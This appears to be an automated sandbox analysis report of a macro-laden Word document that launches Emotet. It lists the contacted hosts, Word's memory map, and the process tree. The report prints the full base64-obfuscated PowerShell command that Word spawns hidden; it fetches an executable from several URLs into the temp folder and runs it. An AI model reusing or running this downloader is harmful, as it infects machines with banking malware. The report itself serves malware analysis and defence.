Word Doc in Attached Email Downloads Emotet

Involved Hosts

Host	Resolved to	Country	City	Protocol
kerineal.com	184.168.152.148	US	Scottsdale	DNS, HTTP, TCP
65.99.230.27		US	Saint Louis	HTTP
185.82.23.28		DE		HTTP

Monitored Processes

Behavior Information - Grouped by Category

Process #1: winword.exe

(Host: 250, Network: 0)

Information	Value
ID	#1
File Name	c:\program files\microsoft office\root\office16\winword.exe
Command Line	"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"
Initial Working Directory	C:\Users\ATVeyDl98Z\Desktop\
Monitor	Start Time: 00:00:14, Reason: Analysis Target
Unmonitor	End Time: 00:02:34, Reason: Terminated by Timeout
Monitor Duration	00:02:20

OS Process Information

Information	Value
PID	0x9f8
Parent PID	0x5f4 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	ZJEWV7F\ATVeyDl98Z
Groups	ZJEWV7F\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f73d (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x A88 0x A84 0x A80 0x A7C 0x A78 0x A74 0x A70 0x A50 0x A48 0x A44 0x A40 0x A3C 0x A38 0x A34 0x A20 0x A10 0x A08 0x A04 0x 9FC 0x A8C 0x A90 0x AB4 0x ACC 0x BB8 0x CB0 0x CB4 0x CB8

Region

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x00020fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00043fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00050fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000060000	0x00060000	0x00060fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000070000	0x00070000	0x0016ffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x00170000	0x001d6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000001e0000	0x001e0000	0x001e0fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000001f0000	0x001f0000	0x001f0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000200000	0x00200000	0x00206fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000210000	0x00210000	0x0030ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000310000	0x00310000	0x00311fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000320000	0x00320000	0x00320fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000330000	0x00330000	0x00330fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000340000	0x00340000	0x00341fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000350000	0x00350000	0x00351fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000360000	0x00360000	0x00362fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000370000	0x00370000	0x0037ffff	Private Memory		Region Actions
pagefile_0x0000000000380000	0x00380000	0x00382fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000390000	0x00390000	0x0039ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000003a0000	0x003a0000	0x00467fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000580000	0x00580000	0x0117ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001180000	0x01180000	0x01182fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001190000	0x01190000	0x01192fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000011a0000	0x011a0000	0x011a1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000011b0000	0x011b0000	0x011cffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000011d0000	0x011d0000	0x011d1fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000011e0000	0x011e0000	0x011e1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000011f0000	0x011f0000	0x01213fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001220000	0x01220000	0x01220fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001230000	0x01230000	0x01238fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001240000	0x01240000	0x01248fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001260000	0x01260000	0x01260fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001270000	0x01270000	0x0127ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000001280000	0x01280000	0x01283fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000001290000	0x01290000	0x01290fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000012a0000	0x012a0000	0x012a0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000012b0000	0x012b0000	0x012b0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000012c0000	0x012c0000	0x012c0fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000012d0000	0x012d0000	0x012d1fff	Pagefile Backed Memory	Readable	Region Actions
winword.exe	0x012e0000	0x014b8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sortdefault.nls	0x014c0000	0x0178efff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000001790000	0x01790000	0x01b82fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001b90000	0x01b90000	0x01c8ffff	Private Memory	Readable, Writable	Region Actions
kernelbase.dll.mui	0x01c90000	0x01d4ffff	Memory Mapped File	Readable, Writable	Region Actions
msxml6r.dll	0x01d50000	0x01d50fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001d60000	0x01d60000	0x01d9ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000001da0000	0x01da0000	0x01e7efff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001e80000	0x01e80000	0x01f7ffff	Private Memory	Readable, Writable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db	0x01f80000	0x01f9ffff	Memory Mapped File	Readable	Region Actions
private_0x0000000001fa0000	0x01fa0000	0x0209ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000020a0000	0x020a0000	0x020c3fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002110000	0x02110000	0x02110fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000002120000	0x02120000	0x02121fff	Pagefile Backed Memory	Readable	Region Actions
c_1255.nls	0x02130000	0x02140fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002150000	0x02150000	0x0215ffff	Private Memory	Readable, Writable	Region Actions
onbttnwd.dll	0x02160000	0x02165fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002170000	0x02170000	0x0226ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002270000	0x02270000	0x0228ffff	Private Memory		Region Actions
private_0x0000000002290000	0x02290000	0x022aefff	Private Memory	Readable, Writable	Region Actions
segoeuib.ttf	0x022b0000	0x02329fff	Memory Mapped File	Readable	Region Actions
private_0x00000000023b0000	0x023b0000	0x023cffff	Private Memory		Region Actions
private_0x00000000023d0000	0x023d0000	0x024cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000024d0000	0x024d0000	0x025cffff	Private Memory	Readable, Writable	Region Actions
stdole2.tlb	0x025d0000	0x025d3fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002600000	0x02600000	0x0263ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002640000	0x02640000	0x0267ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002680000	0x02680000	0x026fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002770000	0x02770000	0x0277ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002780000	0x02780000	0x0287ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000028b0000	0x028b0000	0x029affff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000029b0000	0x029b0000	0x02daffff	Pagefile Backed Memory	Readable	Region Actions
staticcache.dat	0x02db0000	0x036dffff	Memory Mapped File	Readable	Region Actions
segoeui.ttf	0x036e0000	0x0375efff	Memory Mapped File	Readable	Region Actions
private_0x0000000003760000	0x03760000	0x0385ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003880000	0x03880000	0x0397ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000039b0000	0x039b0000	0x039bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000039c0000	0x039c0000	0x03abffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003ad0000	0x03ad0000	0x03b0ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003b30000	0x03b30000	0x03b3ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003b40000	0x03b40000	0x03b7ffff	Private Memory	Readable, Writable, Executable	Region Actions
pagefile_0x0000000003b80000	0x03b80000	0x0437ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000004380000	0x04380000	0x0447ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004480000	0x04480000	0x0467ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000046e0000	0x046e0000	0x047dffff	Private Memory	Readable, Writable	Region Actions
seguisb.ttf	0x047e0000	0x04843fff	Memory Mapped File	Readable	Region Actions
private_0x00000000048a0000	0x048a0000	0x0499ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004a20000	0x04a20000	0x04b1ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000004b20000	0x04b20000	0x04f1ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000004f30000	0x04f30000	0x0502ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005080000	0x05080000	0x050bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000050c0000	0x050c0000	0x054bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000054c0000	0x054c0000	0x058bffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000058c0000	0x058c0000	0x060bffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000060c0000	0x060c0000	0x064c0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000064d0000	0x064d0000	0x068d0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000068e0000	0x068e0000	0x06ce0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006cf0000	0x06cf0000	0x06eeffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006ef0000	0x06ef0000	0x073affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000073b0000	0x073b0000	0x07baffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007bb0000	0x07bb0000	0x07faffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007fb0000	0x07fb0000	0x080affff	Private Memory	Readable, Writable	Region Actions
private_0x0000000008110000	0x08110000	0x0820ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000008210000	0x08210000	0x0830ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000083d0000	0x083d0000	0x084cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000084f0000	0x084f0000	0x085effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000008610000	0x08610000	0x0870ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000008790000	0x08790000	0x0888ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000035c20000	0x35c20000	0x35c2ffff	Private Memory	Readable, Writable, Executable	Region Actions
msohev.dll	0x5f9d0000	0x5f9e6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
onbttnwd.dll	0x5fae0000	0x5fb0bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
chart.dll	0x5fb10000	0x60304fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
riched20.dll	0x60310000	0x604b1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoreei.dll	0x60590000	0x60607fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoree.dll	0x60610000	0x60659fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwrite.dll	0x60660000	0x60769fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d10warp.dll	0x60770000	0x6089bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msptls.dll	0x608a0000	0x609b7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msointl.dll	0x609c0000	0x60b34fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wwintl.dll	0x60b40000	0x60be8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msores.dll	0x60bf0000	0x65a2efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso99lres.dll	0x65a30000	0x66350fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso40uires.dll	0x66360000	0x66667fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso.dll	0x66670000	0x67421fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso99lwin32client.dll	0x67430000	0x679c7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso40uiwin32client.dll	0x679d0000	0x680e4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso30win32client.dll	0x680f0000	0x683f1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso20win32client.dll	0x68400000	0x685d4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oart.dll	0x685e0000	0x691d1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d11.dll	0x691e0000	0x69262fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wwlib.dll	0x69270000	0x6aed1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ucrtbase.dll	0x6aee0000	0x6afbbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
appvisvsubsystems32.dll	0x6afc0000	0x6b174fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
osppc.dll	0x6b280000	0x6b2acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sppc.dll	0x6b2b0000	0x6b2d0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mlang.dll	0x6b690000	0x6b6bdfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
npmproxy.dll	0x6c840000	0x6c847fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msxml6.dll	0x6cf80000	0x6d0d7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winspool.drv	0x6d400000	0x6d450fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
office.odf	0x6ef70000	0x6f128fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-utility-l1-1-0.dll	0x6f130000	0x6f132fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-environment-l1-1-0.dll	0x6f140000	0x6f142fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-filesystem-l1-1-0.dll	0x6f150000	0x6f152fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-time-l1-1-0.dll	0x6f160000	0x6f162fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-multibyte-l1-1-0.dll	0x6f1a0000	0x6f1a4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-math-l1-1-0.dll	0x6f1b0000	0x6f1b4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-locale-l1-1-0.dll	0x6f1c0000	0x6f1c2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcp140.dll	0x6f1d0000	0x6f23cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
For performance reasons, the remaining 294 entries are omitted. The remaining entries can be found in flog.txt.

Host Behavior

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	powershell -e JAB7AHcAYABzAGAAYwBSAEkAcAB0AH0AIAA9ACAAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAG8AYgBqAGUAYwB0ACcALAAnAGUAdwAtACcALAAnAG4AJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADQAfQB7ADIAfQB7ADEAfQB7ADMAfQB7ADAAfQAiACAALQBmACAAJwBsAGwAJwAsACcAUwAnACwAJwAuACcALAAnAGgAZQAnACwAJwBXAFMAYwByAGkAcAB0ACcAKQA7ACQAewBXAGUAQgBjAGwAYABpAGAARQBOAHQAfQAgAD0AIAAuACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACAAJwBuAGUAdwAtACcALAAnAG8AJwAsACcAYgAnACwAJwBqAGUAYwB0ACcAKQAgACgAIgB7ADQAfQB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBsAGkAZQAnACwAJwB0AGUAbQAuAE4AZQB0ACcALAAnAG4AdAAnACwAJwAuAFcAZQBiAEMAJwAsACcAUwB5AHMAJwApADsAJAB7AHIAYQBgAE4ARABPAE0AfQAgAD0AIAAmACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcAYwB0ACcALAAnAGIAagBlACcALAAnAGUAdwAtAG8AJwAsACcAbgAnACkAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHIAYQBuAGQAbwAnACwAJwBtACcAKQA7ACQAewB1AGAAUgBsAFMAfQAgAD0AIAAoACIAewAxADcAfQB7ADIAMQB9AHsAMQAxAH0AewAxADUAfQB7ADEAfQB7ADMAfQB7ADMAOAB9AHsAMwA5AH0AewAzADcAfQB7ADIAMgB9AHsAMQAwAH0AewA2AH0AewAzADEAfQB7ADAAfQB7ADMANAB9AHsAMQA2AH0AewAyADYAfQB7ADMAMAB9AHsAMgAwAH0AewAxADQAfQB7ADkAfQB7ADMANgB9AHsAMgAzAH0AewA4AH0AewAyADQAfQB7ADIANQB9AHsAMgA5AH0AewAyADgAfQB7ADEAMgB9AHsANQB9AHsAMgB9AHsAMQA5AH0AewAyADcAfQB7ADcAfQB7ADEAMwB9AHsANAB9AHsAMQA4AH0AewAzADMAfQB7ADMANQB9AHsAMwAyAH0AIgAgAC0AZgAgACcAZQBhAHQAcwBwAGEAJwAsACcAaQBuAGUAJwAsACcAcwAuAGMAJwAsACcAYQBsAC4AYwBvAG0AJwAsACcAZwAnACwAJwBsAHUAJwAsACcAaAAnACwAJwByAGUAcwBzAC8AJwAsACcAZQBzAC4AbgBlACcALAAnAC8ALABoAHQAdABwACcALAAnACwAJwAsACcALwBrAGUAJwAsACcALwBiAG0AYQBzAHQAZQByAHAAJwAsACcARAAnACwAJwB5AHIAcgAnACwAJwByACcALAAnAC4AdQBrAC8AVgBRAC8ALABoAHQAdABwADoALwAvAHUAbQBlACcALAAnAGgAdAB0ACcALAAnAE4AJwAsACcAbwBtAC8AJwAsACcAbwBtAC8AJwAsACcAcAA6AC8AJwAsACcALwBoAFEAbwBCAG0ALwAnACwAJwAvAC8AbgB5AGUAcgBnACcALAAnAHQALwAnACwAJwBxAHEAcgAvACwAJwAsACcAeAAnACwAJwB3AG8AcgBkAHAAJwAsACcAcAA6AC8AJwAsACcAaAB0AHQAJwAsACcAeAAuAGMAJwAsACcAdAB0AHAAOgAvAC8AJwAsACcASgBGAGgALwAnACwAJwBuAGsAJwAsACcAbQAuAGMAbwAnACwAJwBHACcALAAnADoAJwAsACcAdAAnACwAJwAvAHMAJwAsACcAaQBtAHAAbAB5AGUAbABlAGcAYQBuACcAKQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAbABpAHQAJwAsACcAUwBwACcAKQAuAEkAbgB2AG8AawBlACgAJwAsACcAKQA7ACQAewBuAGAAQQBtAEUAfQAgAD0AIAAkAHsAcgBhAG4ARABgAE8ATQB9AC4AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHQAJwAsACcAbgBlAHgAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBQAGAAQQBUAEgAfQAgAD0AIAAkAHsARQBgAE4AdgA6AGAAVABFAE0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBOAGAAQQBtAEUAfQAgACsAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlAHgAZQAnACwAJwAuACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHsAdQBgAFIAbAB9ACAAaQBuACAAJAB7AFUAUgBgAGwAUwB9ACkAewB0AHIAeQB7ACQAewB3AEUAYgBgAGMATABJAGUAYABOAHQAfQAuACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAG4AbAAnACwAJwBEAG8AdwAnACwAJwBvAGEAZABGAGkAbABlACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AHUAYABSAEwAfQAuACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbgBnACcALAAnAGkAJwAsACcAVABvAFMAdAByACcAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAJAB7AFAAYABBAHQAaAB9ACkAOwAmACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAJwBTACcALAAnAHQAYQByAHQALQAnACwAJwBQAHIAbwBjAGUAcwBzACcAKQAgACQAewBQAEEAYABUAEgAfQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsALgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBpAHQAZQAtAGgAbwBzAHQAJwAsACcAcgAnACwAJwB3ACcAKQAgACQAewBfAH0ALgAiAEUAeABDAGAAZQBgAFAAVABpAE8ATgAiAC4AIgBtAGUAcwBzAGAAQQBgAGcAZQAiADsAfQB9AA0ACgA=	os_pid = 0xad4, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE		1	Fn

Module (2)

Operation	Module	Additional Information	Success	Count	Logfile
Load	VBE7.DLL	base_address = 0x72570000		1	Fn
Get Address	Unknown module name	function = 600, address_out = 0x725c8346		1	Fn

Keyboard (6)

Operation	Additional Information	Success	Count	Logfile
Read	virtual_key_code = VK_CANCEL, result_out = 0		6	Fn

Process #2: powershell.exe

(Host: 726, Network: 38)

Information	Value
ID	#2
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	powershell -e JAB7AHcAYABzAGAAYwBSAEkAcAB0AH0AIAA9ACAAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAG8AYgBqAGUAYwB0ACcALAAnAGUAdwAtACcALAAnAG4AJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADQAfQB7ADIAfQB7ADEAfQB7ADMAfQB7ADAAfQAiACAALQBmACAAJwBsAGwAJwAsACcAUwAnACwAJwAuACcALAAnAGgAZQAnACwAJwBXAFMAYwByAGkAcAB0ACcAKQA7ACQAewBXAGUAQgBjAGwAYABpAGAARQBOAHQAfQAgAD0AIAAuACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACAAJwBuAGUAdwAtACcALAAnAG8AJwAsACcAYgAnACwAJwBqAGUAYwB0ACcAKQAgACgAIgB7ADQAfQB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBsAGkAZQAnACwAJwB0AGUAbQAuAE4AZQB0ACcALAAnAG4AdAAnACwAJwAuAFcAZQBiAEMAJwAsACcAUwB5AHMAJwApADsAJAB7AHIAYQBgAE4ARABPAE0AfQAgAD0AIAAmACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcAYwB0ACcALAAnAGIAagBlACcALAAnAGUAdwAtAG8AJwAsACcAbgAnACkAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHIAYQBuAGQAbwAnACwAJwBtACcAKQA7ACQAewB1AGAAUgBsAFMAfQAgAD0AIAAoACIAewAxADcAfQB7ADIAMQB9AHsAMQAxAH0AewAxADUAfQB7ADEAfQB7ADMAfQB7ADMAOAB9AHsAMwA5AH0AewAzADcAfQB7ADIAMgB9AHsAMQAwAH0AewA2AH0AewAzADEAfQB7ADAAfQB7ADMANAB9AHsAMQA2AH0AewAyADYAfQB7ADMAMAB9AHsAMgAwAH0AewAxADQAfQB7ADkAfQB7ADMANgB9AHsAMgAzAH0AewA4AH0AewAyADQAfQB7ADIANQB9AHsAMgA5AH0AewAyADgAfQB7ADEAMgB9AHsANQB9AHsAMgB9AHsAMQA5AH0AewAyADcAfQB7ADcAfQB7ADEAMwB9AHsANAB9AHsAMQA4AH0AewAzADMAfQB7ADMANQB9AHsAMwAyAH0AIgAgAC0AZgAgACcAZQBhAHQAcwBwAGEAJwAsACcAaQBuAGUAJwAsACcAcwAuAGMAJwAsACcAYQBsAC4AYwBvAG0AJwAsACcAZwAnACwAJwBsAHUAJwAsACcAaAAnACwAJwByAGUAcwBzAC8AJwAsACcAZQBzAC4AbgBlACcALAAnAC8ALABoAHQAdABwACcALAAnACwAJwAsACcALwBrAGUAJwAsACcALwBiAG0AYQBzAHQAZQByAHAAJwAsACcARAAnACwAJwB5AHIAcgAnACwAJwByACcALAAnAC4AdQBrAC8AVgBRAC8ALABoAHQAdABwADoALwAvAHUAbQBlACcALAAnAGgAdAB0ACcALAAnAE4AJwAsACcAbwBtAC8AJwAsACcAbwBtAC8AJwAsACcAcAA6AC8AJwAsACcALwBoAFEAbwBCAG0ALwAnACwAJwAvAC8AbgB5AGUAcgBnACcALAAnAHQALwAnACwAJwBxAHEAcgAvACwAJwAsACcAeAAnACwAJwB3AG8AcgBkAHAAJwAsACcAcAA6AC8AJwAsACcAaAB0AHQAJwAsACcAeAAuAGMAJwAsACcAdAB0AHAAOgAvAC8AJwAsACcASgBGAGgALwAnACwAJwBuAGsAJwAsACcAbQAuAGMAbwAnACwAJwBHACcALAAnADoAJwAsACcAdAAnACwAJwAvAHMAJwAsACcAaQBtAHAAbAB5AGUAbABlAGcAYQBuACcAKQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAbABpAHQAJwAsACcAUwBwACcAKQAuAEkAbgB2AG8AawBlACgAJwAsACcAKQA7ACQAewBuAGAAQQBtAEUAfQAgAD0AIAAkAHsAcgBhAG4ARABgAE8ATQB9AC4AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHQAJwAsACcAbgBlAHgAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBQAGAAQQBUAEgAfQAgAD0AIAAkAHsARQBgAE4AdgA6AGAAVABFAE0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBOAGAAQQBtAEUAfQAgACsAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlAHgAZQAnACwAJwAuACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHsAdQBgAFIAbAB9ACAAaQBuACAAJAB7AFUAUgBgAGwAUwB9ACkAewB0AHIAeQB7ACQAewB3AEUAYgBgAGMATABJAGUAYABOAHQAfQAuACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAG4AbAAnACwAJwBEAG8AdwAnACwAJwBvAGEAZABGAGkAbABlACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AHUAYABSAEwAfQAuACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbgBnACcALAAnAGkAJwAsACcAVABvAFMAdAByACcAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAJAB7AFAAYABBAHQAaAB9ACkAOwAmACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAJwBTACcALAAnAHQAYQByAHQALQAnACwAJwBQAHIAbwBjAGUAcwBzACcAKQAgACQAewBQAEEAYABUAEgAfQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsALgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBpAHQAZQAtAGgAbwBzAHQAJwAsACcAcgAnACwAJwB3ACcAKQAgACQAewBfAH0ALgAiAEUAeABDAGAAZQBgAFAAVABpAE8ATgAiAC4AIgBtAGUAcwBzAGAAQQBgAGcAZQAiADsAfQB9AA0ACgA=
Initial Working Directory	C:\Users\ATVeyDl98Z\Desktop\
Monitor	Start Time: 00:00:30, Reason: Child Process
Unmonitor	End Time: 00:02:34, Reason: Terminated by Timeout
Monitor Duration	00:02:04

OS Process Information

Information	Value
PID	0xad4
Parent PID	0x9f8 (c:\program files\microsoft office\root\office16\winword.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	ZJEWV7F\ATVeyDl98Z
